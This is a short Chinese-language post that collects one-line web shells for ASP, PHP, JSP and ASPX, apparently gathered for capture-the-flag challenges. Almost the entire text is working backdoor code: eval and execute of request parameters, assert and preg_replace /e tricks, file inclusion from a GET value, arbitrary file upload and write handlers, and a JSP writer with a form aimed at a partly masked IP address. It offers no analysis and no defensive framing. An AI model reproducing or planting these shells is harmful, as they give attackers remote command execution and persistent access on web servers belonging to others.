最近总是碰到小马的题目,心想还是小小收集一下各种的小马,碰到新的再更新
ASP
<%eval request("sb")%>
<%execute request("sb")%>
<%execute(request("sb"))%>
<%execute request("sb")%><%
<%<%execute request("sb")%>
<%execute request("sb")[code]
[code]
<script language=vbs runat=server>eval(request("sb"))</script>
<%execute request("sb")[code]
[code]
<script language=vbs runat=server>eval(request("sb"))</script>
%>
<%Eval(Request(chr(35)))%><%
<%eval request("sb")%>
<%ExecuteGlobal request("sb")%>
if Request("sb")
<>"" then ExecuteGlobal request("sb") end if
PHP
<?php eval(
$_POST[sb])
?>
<?php @
eval(
$_POST[sb])
?>
<?php assert(
$_POST[sb]);
?>
<?$_POST[
'sa'](
$_POST[
'sb']);
?>
<?$_POST[
'sa'](
$_POST[
'sb'],
$_POST[
'sc'])
?>
<?php
@preg_replace(
"/[email]/e",
$_POST[
'h'],
"error");
?>
<O>h=@
eval(
$_POST[c]);</O>
<script language=
"php">@
eval(
$_POST[sb])</script>
<?=@
eval(
$_POST[
'cmd']);
<?=`*`;
$filename=
$_GET[
'xbid'];
include (
$filename);
$reg=
"c".
"o".
"p".
"y";
$reg(
$_FILES[MyFile][tmp_name],
$_FILES[MyFile][name]);
JSP
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code
</textarea><BR><center><br>
<input type=submit value="提交">
</form>
ASPX
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句话
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
//C#的asp.net一句话
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
//VB的asp.net一句话
